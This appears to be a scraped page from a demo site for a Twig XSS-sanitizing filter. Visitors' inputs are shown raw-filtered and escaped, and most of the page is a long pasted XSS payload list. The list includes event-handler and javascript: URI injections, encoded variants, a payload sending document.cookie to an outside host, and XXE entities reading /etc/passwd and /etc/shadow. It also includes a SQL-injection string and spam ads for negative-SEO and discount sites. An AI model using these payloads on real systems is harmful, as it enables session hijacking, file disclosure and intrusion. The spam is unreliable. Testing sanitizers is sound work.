<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

keyword(s): test

description: test

by test | at 2020-11-23 00:04:59

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:





<body !#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<
document.vulnerable=true;a=/XSS/\ndocument.vulnerable=true;
<input TYPE="IMAGE" SRC="document.vulnerable=true;">
<body BACKGROUND="document.vulnerable=true;">
<body >


<bgsound SRC="document.vulnerable=true;">


<LAYER SRC="document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="document.vulnerable=true;">
<style>li {list-style-image: url("document.vulnerable=true;");</STYLE><UL>XSS

1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=document.vulnerable=true;">
<IFRAME SRC="document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="document.vulnerable=true;"></frameset>





<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>

< >
 >
& TYPE="text/javascript" >
<style type="text/css">BODY{background:url("document.vulnerable=true")}</style>
<!--[if gte IE 4]></object>
<XML ID=I><X>]]</xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML">
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"></BODY></html>
<? echo('document.vulnerable=true
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>




<input type="image" dynsrc="document.vulnerable=true;">
<bgsound src="document.vulnerable=true;">
&


< rel="stylesheet" href="document.vulnerable=true;">
<iframe src="document.vulnerable=true;">



<meta http-equiv="refresh" content="0;url=document.vulnerable=true;">
<body >




<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="document.vulnerable=true;">
<style><!--</style>
<

" =">
& src="" id="X">;</xml>

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
<style>BODY{:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc">XSS</html>
'"-->
" SRC="http://www.securitycompass.com/xss.js">
" '' SRC="http://www.securitycompass.com/xss.js">" SRC="http://www.securitycompass.com/xss.js"> [Mozilla]
";>;<;BODY !#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br >;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\";&;{alert('XSS')}\";>;
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/>
<~/XSS/*-*/>
<~/XSS/*-*/>
<~/XSS >
">

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>

>">&
"><STYLE>@import"alert('XSS')";</STYLE>
>"'><>
>%22%27><>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"=
< >
< >
&>
<>#115;crip&<>#116;:ale&<>#114;t('XS<>;S')>
<>#0000118as&<>#0000099ri&<>#0000112t:&<>#0000097le&<>#0000114t(&<>#0000039XS&<>#0000083')>    
<>#>#>#>
< >'>
< >'>
&>
& version="1.0" encoding="ISO-8859-1"><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><![CDATA[' or 1=1 or ''=']]>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>&xee;
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xee;
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>&xee;
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///dev/random">]>&xee;

%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e

< >
< >       

<><> >
< src="">

< >
< >

< BACKGROUND="alert('XSS')">
<BODY >
<INPUT TYPE="IMAGE" SRC="alert('XSS');">
alert("XSS");//<alert()ipt>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'>
=(◕_◕)=
<iframe src="http://ha.ckers.org/scriptlet.html"></iframe>
<;/script>;<;script>;alert(1)<;/script>;
          result with twig: {{ xss.xss | escape }}:
          <script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC=" &#14; javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<br SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<table BACKGROUND="javascript:document.vulnerable=true;">
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
<div STYLE="width: expression(document.vulnerable=true);">
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
<;/script>;<;script>;alert(1)<;/script>;
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
<;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>    
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
<script>alert('XSS')</script>
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>       
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
<iframe src="http://ha.ckers.org/scriptlet.html"></iframe>
<;/script>;<;script>;alert(1)<;/script>;
          keyword(s): test
          description: test
          by test | at 2020-11-23 00:02:54
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          %20h%20'%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(75,118,90,65,65,80,103,115,115),1),name_const(CHAR(75,118,90,65,65,80,103,115,115),1))a)%20--%20%22x%22=%22x
          result with twig: {{ xss.xss | escape }}:
          %20h%20'%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(75,118,90,65,65,80,103,115,115),1),name_const(CHAR(75,118,90,65,65,80,103,115,115),1))a)%20--%20%22x%22=%22x
          keyword(s): 
          description: 
          by s | at 2020-11-19 15:14:01
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asdasdasd
          result with twig: {{ xss.xss | escape }}:
          asdasdasd
          keyword(s): 
          description: 
          by asdad | at 2020-11-19 15:12:26
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          ">
          result with twig: {{ xss.xss | escape }}:
          "><img%20src=x%20onerror=alert(1)>
          keyword(s): ">
          description: ">
          by "> | at 2020-11-19 12:51:24
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Competition not playing the game fair and square?
Now you can fight back.

Negative SEO, to make ranks go down:
http://blackhat.to/
          result with twig: {{ xss.xss | escape }}:
          Competition not playing the game fair and square?
Now you can fight back.

Negative SEO, to make ranks go down:
http://blackhat.to/
          keyword(s): 
          description: Competition not playing the game fair and square?
Now you can fight back.

Negative SEO, to make ranks go down:
http://blackhat.to/
          by Lukas Patterson | at 2020-11-18 11:51:11
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          333
          result with twig: {{ xss.xss | escape }}:
          333
          keyword(s): 222
          description: 1111111111
          by 111 | at 2020-11-18 08:54:11
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          body
          result with twig: {{ xss.xss | escape }}:
          body
          keyword(s): 
          description: 
          by a | at 2020-11-17 19:15:59
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          www.chaos.org
          result with twig: {{ xss.xss | escape }}:
          <a href="http://www.chaos.org/">www.chaos.org</a>
          keyword(s): 
          description: 
          by <a href="http://www.chaos.org/">www.chaos.org</a> | at 2020-11-17 19:14:16
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          <?';
          result with twig: {{ xss.xss | escape }}:
          <?';
          keyword(s): 
          description: 
          by <?'; | at 2020-11-17 17:09:26
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert ("W"); </script>
          keyword(s): 
          description: 
          by  | at 2020-11-16 18:20:58
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert ("W"); </script>
          keyword(s): keyword
          description: script alert
          by autor | at 2020-11-16 18:18:32
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          ereq
          result with twig: {{ xss.xss | escape }}:
          ereq
          keyword(s): dasfsdf
          description: 
          by fdsfsd | at 2020-11-16 18:17:01
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          safaf
          result with twig: {{ xss.xss | escape }}:
          safaf
          keyword(s): alert
          description: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          by  | at 2020-11-16 18:15:15
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          
          result with twig: {{ xss.xss | escape }}:
          <script>alert(1)</script>
          keyword(s): kjk
          description: kjkjkj
          by  | at 2020-11-16 09:40:11
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Ut in tempor ipsum 
          result with twig: {{ xss.xss | escape }}:
          Ut in tempor ipsum 
          keyword(s): Magni possimus magn
          description: Inventore reiciendis
          by Consequat Perferend | at 2020-11-09 07:09:23
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          1
          result with twig: {{ xss.xss | escape }}:
          1
          keyword(s): 1
          description: 1
          by 1 | at 2020-11-07 13:40:57
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          asdf
          result with twig: {{ xss.xss | escape }}:
          asdf
          keyword(s): 
          description: * Voraussetzung UMA 2.5.10 oder UMA NG 3.0.4, Microsoft<br>
Exchange 2010, 2013, 2016 oder 2019.
[Dokumentation](https://wiki.securepoint.de/UMA/SEWS-Tool)<br>
[Changelog](https://wiki.securepoint.de/UMA/SEWS-Tool/Changelog) 
          by asdf | at 2020-11-05 16:55:55
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Hello, i try to  your site

          result with twig: {{ xss.xss | escape }}:
          Hello, i try to <script>alert('Hack');</script> your site

          keyword(s): test
          description: Test
          by test | at 2020-11-03 09:35:39
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Hello, i try to  your site
          result with twig: {{ xss.xss | escape }}:
          Hello, i try to <script>alert('Hack');</script> your site
          keyword(s): 
          description: Hello, i try to  your site
          by 123 | at 2020-11-01 18:42:06
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Hello, i try to  your site
          result with twig: {{ xss.xss | escape }}:
          Hello, i try to <script>alert('Hack');</script> your site
          keyword(s): 123
          description: Hello, i try to  your site
          by 123 | at 2020-11-01 18:41:04
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          Hello, i try to  your site
          result with twig: {{ xss.xss | escape }}:
          Hello, i try to <script>alert('Hack');</script> your site
          keyword(s): sdf
          description: sdfds
          by sdf | at 2020-10-30 00:56:36
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          </title><iframe src=eval(string.fromcharcode(97)+String.fromcharcode(108)String.fromcharcode(101)+String.fromchrcode(114)+String.fromcharcode(116)+String.fromcharcode(40)+String.fromcharcode(49)+String fromcharcode(41))>>
          result with twig: {{ xss.xss | escape }}:
          </title><iframe src=javascript:eval(string.fromcharcode(97)+String.fromcharcode(108)String.fromcharcode(101)+String.fromchrcode(114)+String.fromcharcode(116)+String.fromcharcode(40)+String.fromcharcode(49)+String fromcharcode(41))>>
          keyword(s): 2222222
          description: 33333333333
          by 11111111 | at 2020-10-27 12:03:53
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          sds
          result with twig: {{ xss.xss | escape }}:
          sds
          keyword(s): sdsd
          description: sdsd
          by sdsdsd | at 2020-10-22 11:35:14
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          111111111111
          result with twig: {{ xss.xss | escape }}:
          111111111111
          keyword(s): 11111111111111
          description: 1111111111111
          by 11111 | at 2020-10-22 10:43:16
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          coba


          result with twig: {{ xss.xss | escape }}:
          <font/color=blue>coba
<script>location.replace("https://telkom.co.id/sites")</script>
<script>alert("Semangat!!");</script>
          keyword(s): xss
          description: desc
          by ddoool | at 2020-10-22 10:41:41
        

              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          adadasd
          result with twig: {{ xss.xss | escape }}:
          adadasd
          keyword(s): dasda
          description: dasdad
          by asa | at 2020-10-22 08:22:38
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          ok
          result with twig: {{ xss.xss | escape }}:
          <b>ok</b>
          keyword(s): 
          description: 
          by sherif | at 2020-10-20 16:21:30
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          test
          result with twig: {{ xss.xss | escape }}:
          test
          keyword(s): 
          description: 
          by test | at 2020-10-20 16:20:44
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          aaaaaaaaaaaaaaaa
          result with twig: {{ xss.xss | escape }}:
          <h1>aaaaaaaaaaaaaaaa</h1>
          keyword(s): A
          description: A
          by A | at 2020-10-18 02:01:05
        
              
          
          result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:
          HI!

Best prices on the market -35 %

Protection, Fahion Accessories, Wedding Apparel -35%

Watches, Tools, Wedding Apparel -35%

Tools, Jewelry, Bathroom -15%

Bathroom, Lighting, Home -45%

Eyewear, Tools, Phpto -15%

Offer valid 2 days!

SITE: https://gmy.su/:hq2rb

          result with twig: {{ xss.xss | escape }}:
          HI!

Best prices on the market -35 %

Protection, Fahion Accessories, Wedding Apparel -35%

Watches, Tools, Wedding Apparel -35%

Tools, Jewelry, Bathroom -15%

Bathroom, Lighting, Home -45%

Eyewear, Tools, Phpto -15%

Offer valid 2 days!

SITE: https://gmy.su/:hq2rb

          keyword(s): 
          description: HI!

Best offer on the market -40 %

Mobile Phone, Protection, Headphone -25%

Clothing, Wedding Apparel, Mobile Phone -35%

Security, Home, Medical -15%

Fiber, Mobile Phone, Furniture -35%

Medical, Eyewear, Phpto -15%

Offer valid 7 days!

Published on: https://gmy.su/:hq2rb

          by Simone Wasinger | at 2020-10-15 15:44:46
        
              
          
